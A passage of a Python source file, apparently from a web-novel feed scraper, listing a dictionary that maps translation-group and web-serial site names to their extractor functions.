pfuncs_h_n.extractN00bTranslations,\n\t\t\t\t'Nakimushi' : pfuncs_h_n.extractNakimushi,\n\t\t\t\t'[nakulas]' : pfuncs_h_n.extractNakulas,\n\t\t\t\t'Nanjamora' : pfuncs_h_n.extractNanjamora,\n\t\t\t\t'(NanoDesu) - Amagi Brilliant Park ' : pfuncs_h_n.extractNanoDesuAmagiBrilliantPark,\n\t\t\t\t'(NanoDesu) - Fate/Apocrypha' : pfuncs_h_n.extractNanoDesuFateApocrypha,\n\t\t\t\t'(NanoDesu) - Fuyuu Gakuen no Alice and Shirley' : pfuncs_h_n.extractNanoDesuFuyuuGakuennoAliceandShirley,\n\t\t\t\t'(NanoDesu) - Gekka no Utahime to Magi no Ou' : pfuncs_h_n.extractNanoDesuGekkanoUtahimetoMaginoOu,\n\t\t\t\t'(NanoDesu) - GJ-Bu' : pfuncs_h_n.extractNanoDesuGJBu,\n\t\t\t\t'(NanoDesu) - Hai to Gensou no Grimgal' : pfuncs_h_n.extractNanoDesuHaitoGensounoGrimgal,\n\t\t\t\t'(NanoDesu) - Hentai Ouji to Warawanai Neko' : pfuncs_h_n.extractNanoDesuHentaiOujitoWarawanaiNeko,\n\t\t\t\t'(NanoDesu) - Kono Sekai ga Game Dato Ore Dake ga Shitteiru' : pfuncs_h_n.extractNanoDesuKonoSekaigaGameDatoOreDakegaShitteiru,\n\t\t\t\t'(NanoDesu) - Kore wa Zombie Desu ka?' : pfuncs_h_n.extractNanoDesuKorewaZombieDesuka,\n\t\t\t\t'(NanoDesu) - Kurenai' : pfuncs_h_n.extractNanoDesuKurenai,\n\t\t\t\t'NanoDesu Light Novel Translations' : pfuncs_h_n.extractNanoDesuLightNovelTranslations,\n\t\t\t\t'(NanoDesu) - Love★You' : pfuncs_h_n.extractNanoDesuLoveYou,\n\t\t\t\t'(NanoDesu) - Maoyuu Maou Yuusha' : pfuncs_h_n.extractNanoDesuMaoyuuMaouYuusha,\n\t\t\t\t'(NanoDesu) - Mayo Chiki' : pfuncs_h_n.extractNanoDesuMayoChiki,\n\t\t\t\t'(NanoDesu) - Ojamajo Doremi' : pfuncs_h_n.extractNanoDesuOjamajoDoremi,\n\t\t\t\t'(NanoDesu) - Oreimo' : pfuncs_h_n.extractNanoDesuOreimo,\n\t\t\t\t'(NanoDesu) - Rokka no Yuusha' : pfuncs_h_n.extractNanoDesuRokkanoYuusha,\n\t\t\t\t'(NanoDesu) - Saenai Heroine no Sodatekata' : pfuncs_h_n.extractNanoDesuSaenaiHeroinenoSodatekata,\n\t\t\t\t'(NanoDesu) - Sasami-San@Ganbaranai' : pfuncs_h_n.extractNanoDesuSasamiSanGanbaranai,\n\t\t\t\t'(NanoDesu) - Seitokai no Ichizon' : pfuncs_h_n.extractNanoDesuSeitokainoIchizon,\n\t\t\t\t'(NanoDesu) - Sky World' : pfuncs_h_n.extractNanoDesuSkyWorld,\n\t\t\t\t'(NanoDesu) - Yahari Ore no Seishun Love Come wa Machigatteiru' : pfuncs_h_n.extractNanoDesuYahariOrenoSeishunLoveComewaMachigatteiru,\n\t\t\t\t'Nanowave Translations' : pfuncs_h_n.extractNanowaveTranslations,\n\t\t\t\t'National NEET' : pfuncs_h_n.extractNationalNEET,\n\t\t\t\t'Natsu TL' : pfuncs_h_n.extractNatsuTl,\n\t\t\t\t'Lazy NEET Translations' : pfuncs_h_n.extractNEET,\n\t\t\t\t'NEET Translations' : pfuncs_h_n.extractNeetTranslations,\n\t\t\t\t'Nega Translations' : pfuncs_h_n.extractNegaTranslations,\n\t\t\t\t'Nekoyashiki' : pfuncs_h_n.extractNekoyashiki,\n\t\t\t\t'Neo Translations' : pfuncs_h_n.extractNeoTranslations,\n\t\t\t\t'Nepustation' : pfuncs_h_n.extractNepustation,\n\t\t\t\t'Nightbreeze Translations' : pfuncs_h_n.extractNightbreeze,\n\t\t\t\t'NightFall Translations' : pfuncs_h_n.extractNightFallTranslations,\n\t\t\t\t'NinjaNUF' : pfuncs_h_n.extractNinjaNUF,\n\t\t\t\t'Nohohon Translation' : pfuncs_h_n.extractNohohon,\n\t\t\t\t'Nooblate' : pfuncs_h_n.extractNooblate,\n\t\t\t\t'Noodletown Translated' : pfuncs_h_n.extractNoodletownTranslated,\n\t\t\t\t'NOT Daily Translations' : pfuncs_h_n.extractNotDailyTranslations,\n\t\t\t\t'NovelCow' : pfuncs_h_n.extractNovelCow,\n\t\t\t\t'Novelisation' : pfuncs_h_n.extractNovelisation,\n\t\t\t\t'Novel Saga' : pfuncs_h_n.extractNovelSaga,\n\t\t\t\t'Novels Ground' : pfuncs_h_n.extractNovelsGround,\n\t\t\t\t'Novels Japan' : pfuncs_h_n.extractNovelsJapan,\n\t\t\t\t'Novels Nao' : pfuncs_h_n.extractNovelsNao,\n\t\t\t\t'Novel Trans' : pfuncs_h_n.extractNovelTrans,\n\t\t\t\t'NoviceTranslator' : pfuncs_h_n.extractNoviceTranslator,\n\t\t\t\t'Nowhere & Nothing' : pfuncs_h_n.extractNowhereNothing,\n\t\t\t\t'NTRHolic' : pfuncs_h_n.extractNTRHolic,\n\t\t\t\t'Nutty is Procrastinating' : pfuncs_h_n.extractNutty,\n\t\t\t\t'Ohanashimi' : pfuncs_o_u.extractOhanashimi,\n\t\t\t\t'OK Translation' : pfuncs_o_u.extractOKTranslation,\n\t\t\t\t'Omega Harem' : pfuncs_o_u.extractOmegaHarem,\n\t\t\t\t'Omgitsaray Translations' : pfuncs_o_u.extractOmgitsaray,\n\t\t\t\t'One Man Army Translations (OMA)' : pfuncs_o_u.extractOneManArmy,\n\t\t\t\t'One Man Army Translations' : pfuncs_o_u.extractOneManArmy,\n\t\t\t\t'One Second Spring' : pfuncs_o_u.extractOneSecondSpring,\n\t\t\t\t'お兄ちゃん、やめてぇ!' : pfuncs_o_u.extractOniichanyamete,\n\t\t\t\t'Opinisaya.com' : pfuncs_o_u.extractOpinisaya,\n\t\t\t\t'Ore ga Heroine in English' : pfuncs_o_u.extractOregaHeroineinEnglish,\n\t\t\t\t'Origin Novels' : pfuncs_o_u.extractOriginNovels,\n\t\t\t\t'Otome Revolution' : pfuncs_o_u.extractOtomeRevolution,\n\t\t\t\t'Otterspace Translation' : pfuncs_o_u.extractOtterspaceTranslation,\n\t\t\t\t'otterspacetranslation' : pfuncs_o_u.extractOtterspaceTranslation,\n\t\t\t\t'Outspan Foster' : pfuncs_o_u.extractOutspanFoster,\n\t\t\t\t'Oyasumi Reads' : pfuncs_o_u.extractOyasumiReads,\n\t\t\t\t'Pact Web Serial' : pfuncs_o_u.extractPactWebSerial,\n\t\t\t\t'pandafuqtranslations' : pfuncs_o_u.extractPandafuqTranslations,\n\t\t\t\t\"Pandora's Book\" : pfuncs_o_u.extractPandorasBook,\n\t\t\t\t'Patriarch Reliance' : pfuncs_o_u.extractPatriarchReliance,\n\t\t\t\t'Paztok' : pfuncs_o_u.extractPaztok,\n\t\t\t\t'Pea\\'s Kingdom' : pfuncs_o_u.extractPeasKingdom,\n\t\t\t\t'Pea Translation' : pfuncs_o_u.extractPeaTranslation,\n\t\t\t\t'Pekabo Blog' : pfuncs_o_u.extractPekaboBlog,\n\t\t\t\t'Penguin Overlord Translations' : pfuncs_o_u.extractPenguinOverlordTranslations,\n\t\t\t\t'Pettanko Translations' : pfuncs_o_u.extractPettankoTranslations,\n\t\t\t\t'Pielord Translations' : pfuncs_o_u.extractPielordTranslations,\n\t\t\t\t'PiggyBottle Translations' : pfuncs_o_u.extractPiggyBottleTranslations,\n\t\t\t\t'Pika Translations' : pfuncs_o_u.extractPikaTranslations,\n\t\t\t\t'Pippi Site' : pfuncs_o_u.extractPippiSite,\n\t\t\t\t'A Place Of Legends' : pfuncs_o_u.extractPlaceOfLegends,\n\t\t\t\t'PlainlyBored' : pfuncs_o_u.extractPlainlyBored,\n\t\t\t\t'Polyphonic Story Translation Group' : pfuncs_o_u.extractPolyphonicStoryTranslationGroup,\n\t\t\t\t'Popsiclete' : pfuncs_o_u.extractPopsiclete,\n\t\t\t\t'Premium Red Tea' : pfuncs_o_u.extractPremiumRedTea,\n\t\t\t\t'Priddles Translations' : pfuncs_o_u.extractPriddlesTranslations,\n\t\t\t\t'www.pridesfamiliarsmaidens.com' : pfuncs_o_u.extractPridesFamiliarsMaidens,\n\t\t\t\t'Pride X ReVamp' : pfuncs_o_u.extractPrideXReVamp,\n\t\t\t\t'Prince Revolution!' : pfuncs_o_u.extractPrinceRevolution,\n\t\t\t\t'ProcrasTranslation' : pfuncs_o_u.extractProcrasTranslation,\n\t\t\t\t'Project Accelerator' : pfuncs_o_u.extractProjectAccelerator,\n\t\t\t\t'Psicern.Translations' : pfuncs_o_u.extractPsicernTranslations,\n\t\t\t\t'Pumpkin Translations' : pfuncs_o_u.extractPumpkinTranslations,\n\t\t\t\t'putttytranslations' : pfuncs_o_u.extractPuttty,\n\t\t\t\t'Qualidea of Scum and a Gold Coin' : pfuncs_o_u.extractQualideaofScumandaGoldCoin,\n\t\t\t\t'QualiTeaTranslations' : pfuncs_o_u.extractQualiTeaTranslations,\n\t\t\t\t'Quality ★ Mistranslations' : pfuncs_o_u.extractQualityMistranslations,\n\t\t\t\t'Radiant Translations' : pfuncs_o_u.extractRadiantTranslations,\n\t\t\t\t'Rainbow Translations' : pfuncs_o_u.extractRainbowTranslations,\n\t\t\t\t'Raising Angels & Defection' : pfuncs_o_u.extractRaisingAngelsDefection,\n\t\t\t\t'Raising the Dead' : pfuncs_o_u.extractRaisingTheDead,\n\t\t\t\t'RANCER' : pfuncs_o_u.extractRancer,\n\t\t\t\t'Rancer' : pfuncs_o_u.extractRancer,\n\t\t\t\t'Read Me Translations' : pfuncs_o_u.extractReadMeTranslations,\n\t\t\t\t'Realm of Chaos' : pfuncs_o_u.extractRealmOfChaos,\n\t\t\t\t'ℝeanとann@' : pfuncs_o_u.extractReantoAnna,\n\t\t\t\t'Rebirth Online World' : pfuncs_o_u.extractRebirthOnlineWorld,\n\t\t\t\t'Rebirth Online' : pfuncs_o_u.extractRebirthOnlineWorld,\n\t\t\t\t'Red Dragon Translations' : pfuncs_o_u.extractRedDragonTranslations,\n\t\t\t\t'Reddy Creations' : pfuncs_o_u.extractReddyCreations,\n\t\t\t\t'Red Lantern Archives' : pfuncs_o_u.extractRedLanternArchives,\n\t\t\t\t'Rei TransBlog' : pfuncs_o_u.extractReiTransBlog,\n\t\t\t\t'Reject Hero' : pfuncs_o_u.extractRejectHero,\n\t\t\t\t'Rhinabolla' : pfuncs_o_u.extractRhinabolla,\n\t\t\t\t'RidwanTrans' : pfuncs_o_u.extractRidwanTrans,\n\t\t\t\t'RinOtakuBlog' : pfuncs_o_u.extractRinOtakuBlog,\n\t\t\t\t'Rip translations' : pfuncs_o_u.extractRiptranslations,\n\t\t\t\t'Rising Dragons Translation' : pfuncs_o_u.extractRisingDragons,\n\t\t\t\t'Roasted Tea' : pfuncs_o_u.extractRoastedTea,\n\t\t\t\t'Romantic Dreamer\\'s Sanctuary' : pfuncs_o_u.extractRomanticDreamersSanctuary,\n\t\t\t\t'Root of Evil' : pfuncs_o_u.extractRootOfEvil,\n\t\t\t\t'Rosyfantasy - Always Dreaming' : pfuncs_o_u.extractRosyFantasy,\n\t\t\t\t'Rosy Fantasy' : pfuncs_o_u.extractRosyFantasy,\n\t\t\t\t'Roxism HQ' : pfuncs_o_u.extractRoxism,\n\t\t\t\t\"Rui's Translations\" : pfuncs_o_u.extractRuisTranslations,\n\t\t\t\t'Rumanshi\\'s Lair' : pfuncs_o_u.extractRumanshisLair,\n\t\t\t\t'Rumor\\'s Block' : pfuncs_o_u.extractRumorsBlock,\n\t\t\t\t'Ruze Translations' : pfuncs_o_u.extractRuzeTranslations,\n\t\t\t\t'Saber Translations' : pfuncs_o_u.extractSaberTranslations,\n\t\t\t\t'Saiaku Translations Blog' : pfuncs_o_u.extractSaiakuTranslationsBlog,\n\t\t\t\t'桜翻訳! | Light novel translations' : pfuncs_o_u.extractSakurahonyaku,\n\t\t\t\t'Sandwich Kingdom' : pfuncs_o_u.extractSandwichKingdom,\n\t\t\t\t'Sauri\\'s TL Blog' : pfuncs_o_u.extractSaurisTLBlog,\n\t\t\t\t'Scrya Translations' : pfuncs_o_u.extractScryaTranslations,\n\t\t\t\t'SenjiQ creations' : pfuncs_o_u.extractSenjiQcreations,\n\t\t\t\t'SETSUNA86BLOG' : pfuncs_o_u.extractSETSUNA86BLOG,\n\t\t\t\t'Shell2ly C-Novel Site' : pfuncs_o_u.extractShell2lyCNovelSite,\n\t\t\t\t'Sherma Translations' : pfuncs_o_u.extractShermaTranslations,\n\t\t\t\t'Shikkaku Translations' : pfuncs_o_u.extractShikkakuTranslations,\n\t\t\t\t'Shin Sekai Yori – From the New World' : pfuncs_o_u.extractShinSekaiYori,\n\t\t\t\t'Shinsori Translations' : pfuncs_o_u.extractShinsori,\n\t\t\t\t'Shin Translations' : pfuncs_o_u.extractShinTranslations,\n\t\t\t\t'Shiroyukineko Translations' : pfuncs_o_u.extractShiroyukineko,\n\t\t\t\t'Shokyuu Translations' : pfuncs_o_u.extractShokyuuTranslations,\n\t\t\t\t'Silent Tl' : pfuncs_o_u.extractSilentTl,\n\t\t\t\t'Silva\\'s Library' : pfuncs_o_u.extractSilvasLibrary,\n\t\t\t\t'Silver Butterfly' : pfuncs_o_u.extractSilverButterfly,\n\t\t\t\t'Sins of the Fathers' : pfuncs_o_u.extractSinsOfTheFathers,\n\t\t\t\t'Skull Squadron' : pfuncs_o_u.extractSkullSquadron,\n\t\t\t\t'Skythewood translations' : pfuncs_o_u.extractSkythewood,\n\t\t\t\t'Sleepy Translations' : pfuncs_o_u.extractSleepyTranslations,\n\t\t\t\t'Slime Lv1' : pfuncs_o_u.extractSlimeLv1,\n\t\t\t\t'-Sloth-' : pfuncs_o_u.extractSloth,\n\t\t\t\t'Sloth Translations Blog' : pfuncs_o_u.extractSlothTranslationsBlog,\n\t\t\t\t'Snow & Dust' : pfuncs_o_u.extractSnowDust,\n\t\t\t\t'Snow Translations' : pfuncs_o_u.extractSnowTranslations,\n\t\t\t\t'Snowy Publications' : pfuncs_o_u.extractSnowyPublications,\n\t\t\t\t'Soaring Translations' : pfuncs_o_u.extractSoaring,\n\t\t\t\t'Solitary Translation' : pfuncs_o_u.extractSolitaryTranslation,\n\t\t\t\t'Solstar24' : pfuncs_o_u.extractSolstar24,\n\t\t\t\t'www.soltarination.org' : pfuncs_o_u.extractSoltarination,\n\t\t\t\t'Soltarination Scanlations' : pfuncs_o_u.extractSoltarinationScanlations,\n\t\t\t\t'Soojiki\\'s Project' : pfuncs_o_u.extractSoojikisProject,\n\t\t\t\t'Sora Translations' : pfuncs_o_u.extractSoraTranslations,\n\t\t\t\t'Sora Translationsblog' : pfuncs_o_u.extractSoraTranslations,\n\t\t\t\t'Supreme Origin Translations' : pfuncs_o_u.extractSotranslations,\n\t\t\t\t'Sousetsuka' : pfuncs_o_u.extractSousetsuka,\n\t\t\t\t'Spirit God Shura' : pfuncs_o_u.extractSpiritGodShura,\n\t\t\t\t'Spiritual Transcription' : pfuncs_o_u.extractSpiritualTranscription,\n\t\t\t\t'Spring Scents' : pfuncs_o_u.extractSpringScents,\n\t\t\t\t'Starrydawn Translations' : pfuncs_o_u.extractStarrydawnTranslations,\n\t\t\t\t'Stellar Transformation Con.' : pfuncs_o_u.extractStellarTransformationCon,\n\t\t\t\t'STL Translations' : pfuncs_o_u.extractSTLTranslations,\n\t\t\t\t'Stone Burners' : pfuncs_o_u.extractStoneBurners,\n\t\t\t\t'Subudai11' : pfuncs_o_u.extractSubudai11,\n\t\t\t\t'Sun Shower Fields' : pfuncs_o_u.extractSunShowerFields,\n\t\t\t\t'Super Potato Translations' : pfuncs_o_u.extractSuperPotatoTranslations,\n\t\t\t\t'Suteki Da Ne' : pfuncs_o_u.extractSutekiDaNe,\n\t\t\t\t'Sweet A Collections' : pfuncs_o_u.extractSweetACollections,\n\t\t\t\t'Sword and Game' : pfuncs_o_u.extractSwordAndGame,\n\t\t\t\t'Sylver Translations' : pfuncs_o_u.extractSylver,\n\t\t\t\t'Symbiote' : pfuncs_o_u.extractSymbiote,\n\t\t\t\t'~Taffy Translations~' : pfuncs_o_u.extractTaffyTranslations,\n\t\t\t\t'Taida-dono Translations' : pfuncs_o_u.extractTaidadonoTranslations,\n\t\t\t\t'Taint' : pfuncs_o_u.extractTaint,\n\t\t\t\t'Tales of MU' : pfuncs_o_u.extractTalesOfMU,\n\t\t\t\t'The Tales of Paul Twister' : pfuncs_o_u.extractTalesOfPaulTwister,\n\t\t\t\t'Tales of The Forgottenslayer' : pfuncs_o_u.extractTalesofTheForgottenslayer,\n\t\t\t\t'tap-trans » tappity tappity tap.' : pfuncs_o_u.extractTaptrans,\n\t\t\t\t'Tarable Translations' : pfuncs_o_u.extractTarableTranslations,\n\t\t\t\t'Tatakau Shisho Light Novel Translation' : pfuncs_o_u.extractTatakauShishoLightNovelTranslation,\n\t\t\t\t'Tensai Translations' : pfuncs_o_u.extractTensaiTranslations,\n\t\t\t\t'Tentatively under construction' : pfuncs_o_u.extractTentativelyUnderconstruction,\n\t\t\t\t'Ten Thousand Heaven Controlling Sword' : pfuncs_o_u.extractTenThousandHeavenControllingSword,\n\t\t\t\t'Terminus Translation' : pfuncs_o_u.extractTerminusTranslation,\n\t\t\t\t'ThatGuyOverThere' : pfuncs_o_u.extractThatGuyOverThere,\n\t\t\t\t'The Asian Cult' : pfuncs_o_u.extractTheAsianCult,\n\t\t\t\t'The Beginning After The End Novel' : pfuncs_o_u.extractTheBeginningAfterTheEnd,\n\t\t\t\t'TheDefend Translations' : pfuncs_o_u.extractTheDefendTranslations,\n\t\t\t\t'The Iron Teeth' : pfuncs_o_u.extractTheIronTeeth,\n\t\t\t\t'The Last Skull' : pfuncs_o_u.extractTheLastSkull,\n\t\t\t\t'TheLazy9' : pfuncs_o_u.extractTheLazy9,\n\t\t\t\t'The Mustang Translator' : pfuncs_o_u.extractTheMustangTranslator,\n\t\t\t\t'The Named' : pfuncs_o_u.extractTheNamed,\n\t\t\t\t'The Sphere' : pfuncs_o_u.extractTheSphere,\n\t\t\t\t'The Undying Cultivator' : pfuncs_o_u.extractTheUndyingCultivator,\n\t\t\t\t'This World Work' : pfuncs_o_u.extractThisWorldWork,\n\t\t\t\t'Thunder Translation' : pfuncs_o_u.extractThunder,\n\t\t\t\t'Thyaeria Translations' : pfuncs_o_u.extractThyaeria,\n\t\t\t\t'Tieshaunn' : pfuncs_o_u.extractTieshaunn,\n\t\t\t\t'Tinkerbell-san' : pfuncs_o_u.extractTinkerbellsan,\n\t\t\t\t'TL Syosetsu' : pfuncs_o_u.extractTLSyosetsu,\n\t\t\t\t'Tofubyu' : pfuncs_o_u.extractTofubyu,\n\t\t\t\t'Tomorolls' : pfuncs_o_u.extractTomorolls,\n\t\t\t\t'Tony Yon Ka' : pfuncs_o_u.extractTonyYonKa,\n\t\t\t\t'Totally Insane Tranlation' : pfuncs_o_u.extractTotallyInsaneTranslation,\n\t\t\t\t'Totally Insane Translation' : pfuncs_o_u.extractTotallyInsaneTranslation,\n\t\t\t\t'Totokk\\'s Translations' : pfuncs_o_u.extractTotokk,\n\t\t\t\t'Towards the Sky~' : pfuncs_o_u.extractTowardsTheSky,\n\t\t\t\t'Translating For Your Pleasure' : pfuncs_o_u.extractTranslatingForYourPleasure,\n\t\t\t\t'Translating Ze Tian Ji' : pfuncs_o_u.extractTranslatingZeTianJi,\n\t\t\t\t'Translation Nations' : pfuncs_o_u.extractTranslationNations,\n\t\t\t\t'Translation Raven' : pfuncs_o_u.extractTranslationRaven,\n\t\t\t\t'Translations From Outer Space' : pfuncs_o_u.extractTranslationsFromOuterSpace,\n\t\t\t\t'Translation Treasure Box' : pfuncs_o_u.extractTranslationTreasureBox,\n\t\t\t\t'Trinity Archive' : pfuncs_o_u.extractTrinityArchive,\n\t\t\t\t'Tripp Translations' : pfuncs_o_u.extractTrippTl,\n\t\t\t\t'Trung Nguyen' : pfuncs_o_u.extractTrungNguyen,\n\t\t\t\t'Trungt Nguyen 123' : pfuncs_o_u.extractTrungtNguyen,\n\t\t\t\t'Try Translations' : pfuncs_o_u.extractTryTranslations,\n\t\t\t\t'Tseirp Translations' : pfuncs_o_u.extractTseirpTranslations,\n\t\t\t\t'Tsuigeki Translations' : pfuncs_o_u.extractTsuigeki,\n\t\t\t\t'Tsukigomori' : pfuncs_o_u.extractTsukigomori,\n\t\t\t\t'Tumble Into Fantasy' : pfuncs_o_u.extractTumbleIntoFantasy,\n\t\t\t\t'Turb0 Translation' : pfuncs_o_u.extractTurb0,\n\t\t\t\t'Turtle and Hare Translations' : pfuncs_o_u.extractTurtleandHareTranslations,\n\t\t\t\t'中翻英圖書館 Translations' : pfuncs_o_u.extractTuShuGuan,\n\t\t\t\t'Tus-Trans' : pfuncs_o_u.extractTusTrans,\n\t\t\t\t'Twelve Months of May' : pfuncs_o_u.extractTwelveMonthsofMay,\n\t\t\t\t'Twig' : pfuncs_o_u.extractTwig,\n\t\t\t\t'Twisted Cogs' : pfuncs_o_u.extractTwistedCogs,\n\t\t\t\t'Tyrant\\'s Eye Translations' : pfuncs_o_u.extractTyrantsEyeTranslations,\n\t\t\t\t'「\\u3000」' : pfuncs_o_u.extractU3000,\n\t\t\t\t'U Donate We Translate' : pfuncs_o_u.extractUDonateWeTranslate,\n\t\t\t\t'Ukel2x' : pfuncs_o_u.extractUkel2x,\n\t\t\t\t'Ultimate Arcane' : pfuncs_o_u.extractUltimateArcane,\n\t\t\t\t'Unchained Translation' : pfuncs_o_u.extractUnchainedTranslation,\n\t\t\t\t'Undecent Translations' : pfuncs_o_u.extractUndecentTranslations,\n\t\t\t\t'Universes With Meaning' : pfuncs_o_u.extractUniversesWithMeaning,\n\t\t\t\t'Unlimited Novel Failures' : pfuncs_o_u.extractUnlimitedNovelFailures,\n\t\t\t\t'Unlimited Story Works' : pfuncs_o_u.extractUnlimitedStoryWorks,\n\t\t\t\t'unnamedtranslations.blogspot.com' : pfuncs_o_u.extractUnnamedtranslations,\n\t\t\t\t'Untuned Translation Blog' : pfuncs_o_u.extractUntunedTranslation,\n\t\t\t\t'Useless no 4' : pfuncs_o_u.extractUselessno4,\n\t\t\t\t'v7 Silent' : pfuncs_v_other.extractV7Silent,\n\t\t\t\t'Verathragana Stories' : pfuncs_v_other.extractVerathragana,\n\t\t\t\t'Village Translations' : pfuncs_v_other.extractVillageTranslations,\n\t\t\t\t'Void Translations' : pfuncs_v_other.extractVoidTranslations,\n\t\t\t\t'Volare Translations' : pfuncs_v_other.extractVolareTranslations,\n\t\t\t\t'Walking the Storm' : pfuncs_v_other.extractWalkingTheStorm,\n\t\t\t\t'Walk the Jiang Hu' : pfuncs_v_other.extractWalkTheJiangHu,\n\t\t\t\t'Wat Da Meow' : pfuncs_v_other.extractWatDaMeow,\n\t\t\t\t'Watermelon Helmets' : pfuncs_v_other.extractWatermelonHelmets,\n\t\t\t\t'World of Watermelons' : pfuncs_v_other.extractWatermelons,\n\t\t\t\t'WCC Translation' : pfuncs_v_other.extractWCCTranslation,\n\t\t\t\t'Weaving stories and building castles in the clouds' : pfuncs_v_other.extractWeavingstoriesandbuildingcastlesintheclouds,\n\t\t\t\t'Web Novel Japanese Translation' : pfuncs_v_other.extractWebNovelJapaneseTranslation,\n\t\t\t\t'Welcome To The Underdark' : pfuncs_v_other.extractWelcomeToTheUnderdark,\n\t\t\t\t'Wele Translation' : pfuncs_v_other.extractWeleTranslation,\n\t\t\t\t'When The Hunting Party Came' : pfuncs_v_other.extractWhenTheHuntingPartyCame,\n\t\t\t\t'Whimsical Land' : pfuncs_v_other.extractWhimsicalLand,\n\t\t\t\t'White Night Site' : pfuncs_v_other.extractWhiteNightSite,\n\t\t\t\t'White Tiger Translations' : pfuncs_v_other.extractWhiteTigerTranslations,\n\t\t\t\t'Willful Casual' : pfuncs_v_other.extractWillfulCasual,\n\t\t\t\t'Witch Life Novel' : pfuncs_v_other.extractWitchLife,\n\t\t\t\t\"WizThief's Novels\" : pfuncs_v_other.extractWizThiefsNovels,\n\t\t\t\t'WL Translations' : pfuncs_v_other.extractWLTranslations,\n\t\t\t\t'Wolfie Translation' : pfuncs_v_other.extractWolfieTranslation,\n\t\t\t\t'Word of Craft' : pfuncs_v_other.extractWordofCraft,\n\t\t\t\t'World of Summie' : pfuncs_v_other.extractWorldofSummie,\n\t\t\t\t'Worm - A Complete Web Serial' : pfuncs_v_other.extractWormACompleteWebSerial,\n\t\t\t\t'Wuxia Heroes' : pfuncs_v_other.extractWuxiaHeroes,\n\t\t\t\t'WuxiaSociety' : pfuncs_v_other.extractWuxiaSociety,\n\t\t\t\t'Wuxia Translations' : pfuncs_v_other.extractWuxiaTranslations,\n\t\t\t\t'Wuxia Translators' : pfuncs_v_other.extractWuxiaTranslators,\n\t\t\t\t'Wuxiaworld' : pfuncs_v_other.extractWuxiaworld,\n\t\t\t\t'Wuxiwish' : pfuncs_v_other.extractWuxiwish,\n\t\t\t\t'Xant & Minions' : pfuncs_v_other.extractXantAndMinions,\n\t\t\t\t'xantbos.wordpress.com' : pfuncs_v_other.extractXantbos,\n\t\t\t\t'Xant Does Stuff and Things' : pfuncs_v_other.extractXantDoesStuffAndThings,\n\t\t\t\t'XCrossJ' : pfuncs_v_other.extractXCrossJ,\n\t\t\t\t\"Xiaowen206's Blog\" : pfuncs_v_other.extractXiaowen206sBlog,\n\t\t\t\t'Yi Yue Translation' : pfuncs_v_other.extractYiYueTranslation,\n\t\t\t\t'Yoraikun Translation' : pfuncs_v_other.extractYoraikun,\n\t\t\t\t'Youjinsite Translations' : pfuncs_v_other.extractYoujinsite,\n\t\t\t\t'Youko Advent' : pfuncs_v_other.extractYoukoAdvent,\n\t\t\t\t'Youshoku Translations' : pfuncs_v_other.extractYoushoku,\n\t\t\t\t'youtsubasilver\\'s Blog' : pfuncs_v_other.extractYoutsubasilversBlog,\n\t\t\t\t'Yukkuri Free Time Literature Service' : pfuncs_v_other.extractYukkuri,\n\t\t\t\t'Zen Translations' : pfuncs_v_other.extractZenTranslations,\n\t\t\t\t'Zeonic' : pfuncs_v_other.extractZeonic,\n\t\t\t\t'Ziru\\'s Musings | Translations~' : pfuncs_v_other.extractZiruTranslations,\n\t\t\t\t'The Zombie Knight' : pfuncs_v_other.extractZombieKnight,\n\t\t\t\t'ZSW' : pfuncs_v_other.extractZSW,\n\t\t\t\t\"Zxzxzx's blog\" : pfuncs_v_other.extractZxzxzxsBlog,\n\t\t\t\t'一期一会, 万歳!' : pfuncs_v_other.extract一期一会万歳,\n\t\t\t\t'天才創造すなわち百合' : pfuncs_v_other.extract天才創造すなわち百合,\n\t\t\t\t'睡眠中毒' : pfuncs_v_other.extract睡眠中毒,\n\t\t\t\t'輝く世界' : pfuncs_v_other.extract輝く世界,\n\t\t\t\t'12 Superlatives' : pfuncs_v_other.extract12Superlatives,\n\t\t\t\t'1HP' : pfuncs_v_other.extract1HP,\n\t\t\t\t'77 Novel' : pfuncs_v_other.extract77Novel,\n\t\t\t\t'7 Days Trial' : pfuncs_v_other.extract7DaysTrial,\n\t\t\t\t'87 Percent Translation' : pfuncs_v_other.extract87Percent,\n\n\n\n\t\t\t\t# Recently added.\n\n\t\t\t\t'Alternative Projects' : pfuncs_a_g.extractAlternativeProjects,\n\t\t\t\t'Apollo Translations' : pfuncs_a_g.extractApolloTranslations,\n\t\t\t\t'Elemental Cobalt' : pfuncs_a_g.extractElementalCobalt,\n\t\t\t\t'Hiohbye Translations' : pfuncs_h_n.extractHiohbyeTranslations,\n\t\t\t\t'levitytales.com' : pfuncs_h_n.extractLevityTales,\n\t\t\t\t'Levity Tales' : pfuncs_h_n.extractLevityTales,\n\t\t\t\t'Light Novel Cafe' : pfuncs_h_n.extractLightNovelCafe,\n\t\t\t\t'Myoniyoni Translations' : pfuncs_h_n.extractMyoniyoniTranslations,\n\t\t\t\t'No Name Translations' : pfuncs_h_n.extractNoNameTranslations,\n\t\t\t\t'Noob Mtl' : pfuncs_h_n.extractNoobMtl,\n\t\t\t\t'Novels&Chill' : pfuncs_h_n.extractNovelsChill,\n\t\t\t\t'Path of Translation' : pfuncs_o_u.extractPathOfTranslation,\n\t\t\t\t'Reincarnation Translations' : pfuncs_o_u.extractReincarnationTranslations,\n\t\t\t\t'Sakurane' : pfuncs_o_u.extractSakurane,\n\t\t\t\t'Soul Permutation' : pfuncs_o_u.extractSoulPermutation,\n\t\t\t\t'Torii Translations' : pfuncs_o_u.extractToriiTranslations,\n\t\t\t\t'Wums Translations' : pfuncs_v_other.extractWumsTranslations,\n\t\t\t\t'Xianxia Tales' : pfuncs_v_other.extractXianxiaTales,\n\t\t\t\t'Yami Translations' : pfuncs_v_other.extractYamiTranslations,\n\t\t\t\t'Zero Translations' : pfuncs_v_other.extractZeroTranslations,\n\n\t\t\t\t'Ananas Parfait' : pfuncs_a_g.extractAnanasParfait,\n\t\t\t\t'Anime, manga, translations' : pfuncs_a_g.extractAnimeMangaTranslations,\n\t\t\t\t'Ankou Translations' : pfuncs_a_g.extractAnkouTranslations,\n\t\t\t\t'Antheor' : pfuncs_a_g.extractAntheor,\n\t\t\t\t'Bo~' : pfuncs_a_g.extractBo,\n\t\t\t\t'Chaos Words' : pfuncs_a_g.extractChaosWords,\n\t\t\t\t'China Light Novel' : pfuncs_a_g.extractChinaLightNovel,\n\t\t\t\t'Chinese Novel Translated' : pfuncs_a_g.extractChineseNovelTranslated,\n\t\t\t\t'ChocolateCosmos Translations' : pfuncs_a_g.extractChocolateCosmosTranslations,\n\t\t\t\t'Datebayo Blog' : pfuncs_a_g.extractDatebayoBlog,\n\t\t\t\t'Daupao' : 